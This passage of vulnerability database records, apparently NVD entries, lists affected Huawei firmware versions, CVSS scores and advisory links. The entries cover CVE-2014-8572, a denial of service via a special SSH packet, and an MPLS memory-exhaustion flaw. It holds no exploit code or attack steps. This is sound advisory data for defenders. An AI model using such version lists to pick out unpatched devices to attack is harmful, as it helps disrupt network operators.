huawei s5300_firmware v100r006
huawei s5300_firmware v200r001
huawei s5300_firmware v200r002
huawei s5300_firmware v200r003
huawei s5300 -
huawei s5700_firmware *
huawei s5700_firmware v100r006
huawei s5700_firmware v200r001
huawei s5700_firmware v200r002
huawei s5700_firmware v200r003
huawei s5700 -
huawei s6700_firmware *
huawei s6700_firmware v100r006
huawei s6700_firmware v200r001
huawei s6700_firmware v200r002
huawei s6700_firmware v200r003
huawei s6700 -
huawei s6300_firmware *
huawei s6300_firmware v100r006
huawei s6300_firmware v200r001
huawei s6300_firmware v200r002
huawei s6300_firmware v200r003
huawei s6300 -
huawei s7700_firmware *
huawei s7700_firmware v100r006
huawei s7700_firmware v200r001
huawei s7700_firmware v200r002
huawei s7700_firmware v200r003
huawei s7700 -
huawei s9700_firmware *
huawei s9700_firmware v100r006
huawei s9700_firmware v200r001
huawei s9700_firmware v200r002
huawei s9700_firmware v200r003
huawei s9700 -
huawei s9300_firmware *
huawei s9300_firmware v100r006
huawei s9300_firmware v200r001
huawei s9300_firmware v200r002
huawei s9300_firmware v200r003
huawei s9300 -
huawei s9300e_firmware *
huawei s9300e_firmware v100r006
huawei s9300e_firmware v200r001
huawei s9300e_firmware v200r002
huawei s9300e_firmware v200r003
huawei s9300e -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ac6605_firmware:ac6605_v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "859A83C4-3AA0-45EA-87DE-CCE978D73474",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ac6605_firmware:ac6605_v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "CA904391-4350-4C84-A39E-C9CE8DC78C44",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ac6605:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "BA1E5AE5-EBB2-4E05-A3C7-E2CA54205FF7",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:acu_firmware:acu_v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "30C4DFFF-9A41-4351-B608-8CCCFFB80505",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:acu_firmware:acu_v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C8BB0D86-0EFE-48D8-941E-53F574987CD8",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:acu:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "60FE6911-4BC0-48D7-8E38-88BDF8E4B5F0",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s_series_firmware:v100r006c05:*:*:*:*:*:*:*",
                     matchCriteriaId: "D775B6F0-99F2-4F93-ADE5-9006E511B0C3",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s2300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "17566603-275F-4E6B-B5D9-4A716EEC03DC",
                     vulnerable: false,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s2700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DD2CD071-58E4-4061-8217-990453213470",
                     vulnerable: false,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s3300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "1A1410A1-ADCC-474F-ABEE-F0FE48E4CD7A",
                     vulnerable: false,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s3700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "B7F84390-E120-406B-967D-B473EB110EA9",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "E21E7C93-95A0-4685-9844-40495011C279",
                     versionEndIncluding: "v200r005c00spc300",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "4A7A8C30-4C01-4958-A6B3-03337B78366E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "A0D0E1B7-3843-4E18-88AC-D851E9231728",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "258F4E81-9B8A-4133-868D-8829098443D7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "2E3CCFD9-46A6-4A56-9300-DF8E6F35446B",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "D754D004-C6B3-458A-ADE7-F66CC7F6392E",
                     versionEndIncluding: "v200r005c00spc300",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "CBE6AAB7-B389-48DF-9732-38FE988DB2D4",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "BA745187-432A-4BCA-8FE6-0A1F4FDBB010",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "60AE0EC6-91F2-4058-9F1B-906F02828976",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "A59BADD8-584B-4E53-8386-4B8ADA947CFE",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "174812BF-795B-4945-B637-3E0E9CFD247F",
                     versionEndIncluding: "v200r005c00spc300",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "E6804EC1-E774-43B9-B513-896F53AFCD2A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "16289CCE-0803-4AB1-AE98-73F78580C3BE",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "1F3C5718-DC84-456F-9816-052395BCF3FF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "D82C04A8-3884-42E5-BE38-E1AAE842A759",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA7AC10D-B0DD-4206-8642-134DDD585C06",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "4C42CBC6-ADE7-4B16-835C-D06FA23F47BD",
                     versionEndIncluding: "v200r005c00spc300",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "5B127953-86A8-495E-8868-7764F8A8C76E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "C8E49AF7-A906-4CB2-83E2-D263A7E852B0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "4CFA05B8-4462-4D11-8A9F-488AF0287FF0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "3A7E8867-76FF-4834-A6FF-08537BD6AE8E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA3C8988-A1FC-4B04-9134-F2BDDADEAFB5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A234C65E-2B24-451E-97D2-43440C072043",
                     versionEndIncluding: "v200r005c00spc300",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "C3FA00DD-61AE-44CA-B995-7BE5249F8F20",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "89C05EAD-1274-42FE-AEF3-7AD5B0DAF65D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "FB355FCB-9A98-49D4-878A-A6EE5DC8A3AD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "B2047FBF-4E62-458C-8AF9-C03ED9D9309E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8769C2C4-E333-432B-8943-CFDFAE013379",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "4E05A2C5-3BF8-451C-95D3-71BEFCC08DC6",
                     versionEndIncluding: "v200r005c00spc300",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "7BBF657B-A249-459F-BE89-FAD3AF4AA791",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "C60B2971-FE60-4B4F-AAC1-73B9E932135D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "6A231837-BC55-47DF-BB64-EDD52B9901DA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "7062DE16-0EDF-45B3-AF49-150581176FF2",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "75FAA4BF-1ED0-4059-ADA1-071AF1BF2882",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A4732A3E-C3BC-427D-B0A4-31B2B24A411F",
                     versionEndIncluding: "v200r005c00spc300",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "F32B3FFA-DD66-47A0-AB26-5CC385D898A9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "C2E49E77-F8E3-40EA-BD94-5911DC93FEE1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "E9B9B68D-C9F2-42AB-8287-0D1744DB0DDD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "8FE55995-6CE6-4142-BBCF-D268D0967AE0",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300e_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "CA033B4D-46F1-43AD-B5A7-9AF96B3DE6A9",
                     versionEndIncluding: "v200r005c00spc300",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300e_firmware:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "3712D5B6-0D98-422F-8270-C151A2788984",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300e_firmware:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "EEACD3C6-6D1D-4070-8962-D0CD485AA754",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300e_firmware:v200r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "0A319D8E-17B1-4E61-B61C-596DCBF86475",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300e_firmware:v200r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "E721F5DD-8F2D-4A1C-9456-FB6476066661",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300e:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "B913A258-48B6-45D0-A37B-2C665DCA735C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Huawei AC6605 with software V200R001C00; AC6605 with software V200R002C00; ACU with software V200R001C00; ACU with software V200R002C00; S2300, S3300, S2700, S3700 with software V100R006C05 and earlier versions; S5300, S5700, S6300, S6700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions; S7700, S9300, S9300E, S9700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions could allow remote attackers to send a special SSH packet to the VRP device to cause a denial of service.",
      },
      {
         lang: "es",
         value: "Huawei AC6605 con software V200R001C00; AC6605 con software V200R002C00; ACU con software V200R001C00; ACU con software V200R002C00; S2300, S3300, S2700, S3700 con software V100R006C05 y versiones anteriores; S5300, S5700, S6300, S6700 con software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 y versiones anteriores; S7700, S9300, S9300E, S9700 con software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 y versiones anteriores podrían permitir a atacantes remotos enviar un paquete SSH especial al dispositivo VRP para provocar una denegación de servicio.",
      },
   ],
   id: "CVE-2014-8572",
   lastModified: "2024-11-21T02:19:21.723",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.8,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.5,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
               version: "3.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2017-04-02T20:59:00.423",
   references: [
      {
         source: "psirt@huawei.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/hw-373182",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/hw-373182",
      },
   ],
   sourceIdentifier: "psirt@huawei.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-20",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2017-04-02 20:59
Modified
2024-11-21 03:00
Summary
Huawei AR3200 with software V200R007C00, V200R005C32, V200R005C20; S12700 with software V200R008C00, V200R007C00; S5300 with software V200R008C00, V200R007C00, V200R006C00; S5700 with software V200R008C00, V200R007C00, V200R006C00; S6300 with software V200R008C00, V200R007C00; S6700 with software V200R008C00, V200R007C00; S7700 with software V200R008C00, V200R007C00, V200R006C00; S9300 with software V200R008C00, V200R007C00, V200R006C00; and S9700 with software V200R008C00, V200R007C00, V200R006C00 allow remote attackers to send abnormal Multiprotocol Label Switching (MPLS) packets to cause memory exhaustion.
Impacted products
Vendor Product Version
huawei ar3200_firmware v200r005c20
huawei ar3200_firmware v200r005c32
huawei ar3200_firmware v200r007c00
huawei ar3200 -
huawei s12700_firmware v200r007c00
huawei s12700_firmware v200r008c00
huawei s12700 -
huawei s5300_firmware v200r006c00
huawei s5300_firmware v200r007c00
huawei s5300_firmware v200r008c00
huawei s5300 -
huawei s5700_firmware v200r006c00
huawei s5700_firmware v200r007c00
huawei s5700_firmware v200r008c00
huawei s5700 -
huawei s6300_firmware v200r007c00
huawei s6300_firmware v200r008c00
huawei s6300 -
huawei s6700_firmware v200r007c00
huawei s6700_firmware v200r008c00
huawei s6700 -
huawei s7700_firmware v200r006c00
huawei s7700_firmware v200r007c00
huawei s7700_firmware v200r008c00
huawei s7700 -
huawei s9300_firmware v200r006c00
huawei s9300_firmware v200r007c00
huawei s9300_firmware v200r008c00
huawei s9300 -
huawei s9700_firmware v200r006c00
huawei s9700_firmware v200r007c00
huawei s9700_firmware v200r008c00
huawei s9700 -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ar3200_firmware:v200r005c20:*:*:*:*:*:*:*",
                     matchCriteriaId: "3C10C07E-5194-4EAB-9AC8-DB87CE52F5FA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar3200_firmware:v200r005c32:*:*:*:*:*:*:*",
                     matchCriteriaId: "7FE26EE9-2331-4D72-96CF-635A0A4EBE3E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar3200_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "9752658E-3CF5-4D9E-98FB-D15FD892479C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ar3200:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "9309E1AA-0C4E-422C-9307-A8DD0AE5D576",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "10CBC93B-5CF6-45BF-A90A-84B7693E27FD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "BD4C5CC9-FD60-4C64-8F88-CFC71BBEA663",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "138C1E57-176C-46B1-9704-D9C8391CC802",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "58C2E728-E8F2-461D-A069-4BEC88B94FD0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD6B13D4-07F3-4CB5-8194-89781E685A78",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5454BC21-A04F-4B3D-8533-2414B6E1BC8C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5973A534-F961-4A97-B20E-994BA28AFE29",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "40745A01-E5AC-4207-A34F-D8E7F7231F83",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "21FFF548-FBEF-468A-A8DE-1DB1B7C0B3AF",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D5811970-FE82-4888-A01D-B356B5578296",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "939C73D9-E0E9-47A5-970E-6C84F5ECD2D7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA3C8988-A1FC-4B04-9134-F2BDDADEAFB5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FF4AF711-D921-4261-A459-2A0780EA951F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "8DA5CF67-A58B-4666-B87E-712507233453",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA7AC10D-B0DD-4206-8642-134DDD585C06",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "EF3FB3CC-2EAC-4A08-BDDC-DCACEE9FA2AE",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "2377CD30-6F57-46CB-9DD1-E29458A7D928",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1D79CD09-3414-4105-AD59-F3D1BAC61B7E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8769C2C4-E333-432B-8943-CFDFAE013379",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "BC8AE44D-1924-4C01-B4B9-CC5BF485A3EB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "886E9D1F-25FA-41FA-A64B-E42B9910D2B3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "0E7DB9D3-BB34-49BE-8302-A054D79FE8D6",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "6AC7E622-010C-4C5D-8AA6-D4793AFCE0E0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D78DAB13-32AA-4813-AB0A-0EA870F41183",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "36AB80F7-1BD2-4169-AC70-708CE84BB15C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
